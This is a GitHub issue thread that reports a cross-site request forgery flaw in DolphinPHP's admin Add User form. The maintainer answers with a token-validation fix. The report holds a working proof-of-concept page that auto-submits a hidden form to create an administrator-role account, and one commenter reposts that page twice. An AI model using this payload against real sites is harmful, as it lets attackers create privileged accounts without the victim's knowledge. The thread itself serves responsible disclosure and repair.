### ISSUE TITLE
Add User Function with CSRF vulnerability

### ISSUE THREAD

**Issue by testnet0** [caiweiming/DolphinPHP#26]
The Add User form without csrf token.
Hacker can use it to add a new user.
Spoofing an administrator to open this page :
```
<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq&#64;aixinwei&#46;wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
<script>
    var f=document.getElementById("test");
    f.submit();
</script>
  </body>
</html>
```
suggestion for repairing:add csrf token to the html form.

**Comment by Aixinwei** [comment]
<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq&#64;aixinwei&#46;wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
<script>
    var f=document.getElementById("test");
    f.submit();
</script>
  </body>
</html>

**Comment by Aixinwei** [comment]
<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq&#64;aixinwei&#46;wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
<script>
    var f=document.getElementById("test");
    f.submit();
</script>
  </body>
</html>

**Comment by snksos** [comment]
If there is no login background, this code will not be executed and will only jump to the login page. @Aixinwei

**Comment by caiweiming** [comment]
Thank you for your advice!
If the version is 1.3.1 or above,you can add a validate rule in `user\validate\User.php` like this:
```
protected $rule = [
        'username|用户名' => 'require|alphaNum|unique:admin_user',
        'nickname|昵称'  => 'require|unique:admin_user',
        'role|角色'      => 'require',
        'email|邮箱'     => 'email|unique:admin_user',
        'password|密码'  => 'require|length:6,20',
        'mobile|手机号'   => 'regex:^1\d{10}|unique:admin_user',
        '__token__' => 'require|token',
];
```
and edit $scene like this:
```
protected $scene = [
        //更新
        'update'  =>  ['email', 'password' => 'length:6,20', 'mobile', 'role', '__token__'],
        //登录
        'signin'  =>  ['username' => 'require', 'password' => 'require'],
];
```
